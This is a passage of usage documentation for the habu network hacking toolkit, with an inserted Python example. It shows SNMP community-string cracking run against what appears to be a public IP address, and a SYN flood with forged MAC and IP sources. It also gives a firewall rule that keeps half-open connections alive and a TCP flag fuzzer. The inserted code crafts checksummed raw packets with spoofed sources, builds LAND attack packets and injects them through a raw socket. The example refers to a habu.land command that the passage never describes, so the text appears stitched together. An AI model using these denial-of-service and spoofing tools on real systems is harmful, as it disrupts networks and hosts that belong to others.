The dictionary used is the one distributed with the onesixtyone tool (https://github.com/trailofbits/onesixtyone).
$ sudo habu.snmp_crack 179.125.234.210
Community found: private
Community found: public
Note: You can also receive messages like <UNIVERSAL> <class 'scapy.asn1.asn1.ASN1_Class_metaclass'>, I don't know how to suppress them for now.


habu.synflood: SYN Flood Attack Implementation
This command launches a lot of TCP connections and keeps them open. Some very old systems can suffer a Denial of Service from this. More info: https://en.wikipedia.org/wiki/SYN_flood
$ sudo habu.synflood 172.16.0.10
.................
Each dot is a packet sent.
You can use the options '-2' and '-3' to forge the layer 2/3 addresses. If you use them, each connection is sent from a random layer 2 (MAC) and/or layer 3 (IP) address.
You can choose the number of connections to create with the '-c' option. The default is to never stop creating connections.
Note: If you send the packets from your real IP address and want to keep the connections half-open, you need to set up your firewall so that it does not send the RST packets your kernel would otherwise emit for the unexpected SYN-ACKs. With habu, you can do this with the following command (only works with Linux + iptables):
$ sudo habu.firewall --no-rst
You can check the result with "iptables -L -n"; you will see something like this:
Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination
DROP       tcp  --  0.0.0.0/0            0.0.0.0/0            tcp flags:0x04/0x04


habu.tcpflags: TCP Flag Fuzzer
This command sends TCP packets with different flags and tells you what responses it receives.
It can be used to analyze how different TCP/IP stack implementations and configurations respond to packets with various flag combinations.
$ sudo habu.tcpflags www.portantier.com
S -> SA
FS -> SA
FA -> R
SA -> R
By default, the command sends all possible flag combinations. You can specify which flags must always be present (reducing the number of combinations) with the '-f' option.
You can also specify which flags must be present in a response packet for it to be shown, with the '-r' option.
With the next command, you see all the combinations that have the FIN (F) flag set and generate a response containing the RST (R) flag.
$ sudo habu.tcpflags -f F -r R www.portantier.com
FPA -> R
FSPA -> R
FAU -> R
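Both habu.land and habu.tcpflags come down to one primitive: a raw IPv4/TCP segment whose source address, ports and flag bits are chosen by the attacker rather than by the kernel, with checksums the receiving stack will accept. The following is an added example and not habu's code (habu does this with scapy): it builds such packets with correct RFC 1071 checksums, enumerates every flag combination the way '-f' narrows them down, and shows the LAND case (source == destination). Addresses and ports are constructed; send_packet needs a Linux raw socket and root, and the one-letter flag names follow the habu/scapy output shown above. Reading the replies ("S -> SA") additionally needs a sniffer, which is left out.

```python
"""IPv4/TCP packet construction with correct checksums and arbitrary flag
combinations: the primitive behind habu.land (source == destination) and
habu.tcpflags (probe every flag combination). Added example, not habu's code
(habu uses scapy); addresses and ports are constructed. Nothing is sent unless
send_packet is called, which needs a Linux raw socket and root."""
import socket
import struct

# TCP flag letters as habu/scapy print them, in header bit order.
FLAG_BITS = {"F": 0x01, "S": 0x02, "R": 0x04, "P": 0x08,
             "A": 0x10, "U": 0x20, "E": 0x40, "C": 0x80}


def flags_to_int(letters):
    return sum(FLAG_BITS[c] for c in letters.upper())


def int_to_flags(value):
    return "".join(c for c, bit in FLAG_BITS.items() if value & bit)


def flag_combinations(required=""):
    """All 8-bit flag combinations (as letter strings) that contain `required`,
    i.e. what habu.tcpflags -f narrows the probe set down to."""
    need = flags_to_int(required)
    return [int_to_flags(v) for v in range(256) if v & need == need]


def inet_checksum(data):
    """RFC 1071 one's-complement sum of 16-bit words, complemented."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def tcp_pseudo_header(src_ip, dst_ip, tcp_len):
    return socket.inet_aton(src_ip) + socket.inet_aton(dst_ip) + struct.pack("!BBH", 0, 6, tcp_len)


def build_tcp(src_ip, dst_ip, sport, dport, flags, seq=0, ack=0, window=8192):
    """20-byte TCP header (no options) with checksum over the IPv4 pseudo-header."""
    offset_flags = (5 << 12) | flags_to_int(flags)      # data offset = 5 words
    hdr = struct.pack("!HHIIHHHH", sport, dport, seq, ack, offset_flags, window, 0, 0)
    csum = inet_checksum(tcp_pseudo_header(src_ip, dst_ip, len(hdr)) + hdr)
    return hdr[:16] + struct.pack("!H", csum) + hdr[18:]


def verify_tcp_checksum(src_ip, dst_ip, segment):
    """True when the checksum in `segment` is consistent with the pseudo-header."""
    return inet_checksum(tcp_pseudo_header(src_ip, dst_ip, len(segment)) + segment) == 0


def build_ipv4(src_ip, dst_ip, payload, ttl=64, ident=0):
    """IPv4 header (protocol TCP) plus payload; the source may be spoofed freely."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), ident, 0, ttl, 6, 0,
                      socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    return hdr[:10] + struct.pack("!H", inet_checksum(hdr)) + hdr[12:] + payload


def land_packet(target_ip, port):
    """LAND: a SYN whose source address and port equal the destination's."""
    return build_ipv4(target_ip, target_ip, build_tcp(target_ip, target_ip, port, port, "S"))


def tcpflags_probes(src_ip, dst_ip, dport, required="", sport=40000):
    """(flags, packet) for every combination, as habu.tcpflags would send them."""
    return [(f, build_ipv4(src_ip, dst_ip, build_tcp(src_ip, dst_ip, sport, dport, f)))
            for f in flag_combinations(required)]


def send_packet(dst_ip, packet):
    """Inject a complete IPv4 packet (Linux: IPPROTO_RAW implies IP_HDRINCL; root needed)."""
    with socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) as s:
        return s.sendto(packet, (dst_ip, 0))


if __name__ == "__main__":
    pkt = land_packet("172.16.0.10", 139)                 # constructed target
    print(len(pkt), verify_tcp_checksum("172.16.0.10", "172.16.0.10", pkt[20:]))
    print(len(flag_combinations("F")), "probes with FIN set")
```

Because the source address is written into the IP header directly, the same builder gives habu.synflood's '-3' behaviour by passing a random src_ip; when the real address is used instead, the kernel's own RST replies are what the '--no-rst' iptables rule above suppresses.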


habu - Network Hacking Toolkit